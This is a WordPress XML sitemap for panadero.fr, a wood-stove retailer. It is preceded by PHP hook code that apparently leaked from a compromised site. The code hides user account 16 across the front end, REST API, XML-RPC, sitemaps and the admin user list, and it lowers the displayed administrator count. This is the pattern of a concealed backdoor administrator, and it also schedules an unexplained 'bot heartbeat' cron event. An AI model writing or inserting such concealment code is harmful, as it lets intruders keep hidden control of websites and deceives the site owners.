add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 16;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 16 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 16 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 16;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 16;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 16;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/16(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 16;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-16{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
 <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//panadero.fr/main-sitemap.xsl"?>
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<url>
		<loc>https://panadero.fr/</loc>
		<lastmod>2025-12-03T12:09:15+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/modele-allegro-moderne-1.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/HDE_FOA-1-1-rd8xaa0donunr9am8njv8iwogzrxwf2j9cgo7jnz0g.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/image-49.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/SUE_FOA-1.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/post-fabrica-hombre-sol.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/post-fabrica-sold-hombre.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/post-fabrica-17-maquina.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/pc-mantenimiento.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/foto-cliente-modelo-onix-3v-rd8xa92jy1zkif02dzsvec2fcgwrsouiddfkosp5b8.png</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/cliente-chimenea-cafe-rd8xa92jrh62jiqjrlcndaovd8kkpz1oj70j1lxnyq.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/about_lifestyle_-rd8xa92k202vzljsw0scl2vdnzzb9k6b2z8adtwcg4.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/08/cliente-lectura.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/contactez-nous/</loc>
		<lastmod>2026-03-19T07:39:59+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/livraison/</loc>
		<lastmod>2026-03-18T11:26:56+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/terms-and-conditions/</loc>
		<lastmod>2026-03-10T08:17:51+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/returns/</loc>
		<lastmod>2026-03-10T08:16:24+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/questions-frequemment/</loc>
		<lastmod>2026-03-03T17:22:27+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/paiements/</loc>
		<lastmod>2026-03-03T16:31:22+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/experiences/</loc>
		<lastmod>2026-02-05T08:08:18+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2026/02/NAHALIE-CELLIIER-FOTO-576x1024.png</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/03/2-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/03/3-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/03/4-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/03/9-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/04/FREDERIQUE-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/04/about_lifestyle_-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/11/h-izq-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/12/Panadero-101-s-576x1024.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2026/02/BENEDICT-B-576x1024.png</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/installers/</loc>
		<lastmod>2025-08-26T11:39:34+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/installers-2/</loc>
		<lastmod>2025-08-26T11:38:57+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/ecodesign/</loc>
		<lastmod>2025-08-26T11:38:24+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/06/ecodesign-2022.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/06/emisiones_en.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/06/garantia_en-1.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/careers/</loc>
		<lastmod>2025-08-26T11:37:59+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/avis-legal/</loc>
		<lastmod>2025-07-04T06:26:57+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/politique-confidentialite/</loc>
		<lastmod>2025-07-03T11:53:56+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/poeles-a-bois/</loc>
		<lastmod>2025-04-11T08:38:35+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/regalo-lenero-qwa3ysly0dhyr0o0boqda5dz03f2za6jcl9hp63rjq.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/04/garantia.webp</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/04/envio.webp</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/04/entrega.webp</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/04/intereses.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/04/devolucion.webp</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/systeme-de-gestion-integre/</loc>
		<lastmod>2025-03-06T17:19:45+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2025/03/desempneo-calidad.png</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/iso-9001-r2gyk4zsd7yuipzlbokem2wq9oywwidhg890rbmqwa.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/ISO450011-qwa3yl39pjzjbjsdmfo2b6amwi7knkl7xv4xzed5ua.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/iso-14001-r2gyki5j0wgv19gh6u96kzl6l361w9tq61dth738k8.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/cookie-policy-eu/</loc>
		<lastmod>2025-02-24T11:16:11+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/returns-2/</loc>
		<lastmod>2025-02-17T17:16:00+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/poeles-a-bois/pieces-detachees/</loc>
		<lastmod>2024-10-23T15:34:03+00:00</lastmod>
	</url>
	<url>
		<loc>https://panadero.fr/histoire/</loc>
		<lastmod>2024-10-23T10:50:55+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/07/foto-historia-1.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/10/diseno-web4-scaled-1-1024x683.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/10/diseno-web3-scaled-1-1024x683.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/10/diseno-web2-scaled-1-1024x683.jpg</image:loc>
		</image:image>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/07/equipo-panadero-hoy-1024x349.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/incentivi-conto-termico/</loc>
		<lastmod>2024-08-12T14:18:03+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/2024/08/zonas-conto-termico-italia-800x1024.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/iso-certifications/</loc>
		<lastmod>2024-08-06T09:13:18+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/ISO450011-qs7cl2src6glz039uabv5d2cvj8fewsbbt060i1cr6.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/iso-certifications/</loc>
		<lastmod>2024-07-19T10:08:54+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/ISO450011-qs7cl2src6glz039uabv5d2cvj8fewsbbt060i1cr6.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/iso-certifications/</loc>
		<lastmod>2024-07-19T10:08:54+00:00</lastmod>
		<image:image>
			<image:loc>https://panadero.fr/wp-content/uploads/elementor/thumbs/ISO450011-qs7cl2src6glz039uabv5d2cvj8fewsbbt060i1cr6.jpg</image:loc>
		</image:image>
	</url>
	<url>
		<loc>https://panadero.fr/shipping/</loc>
		<lastmod>2024-07-02T11:50:59+00:00</lastmod>
	</url>
</urlset>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->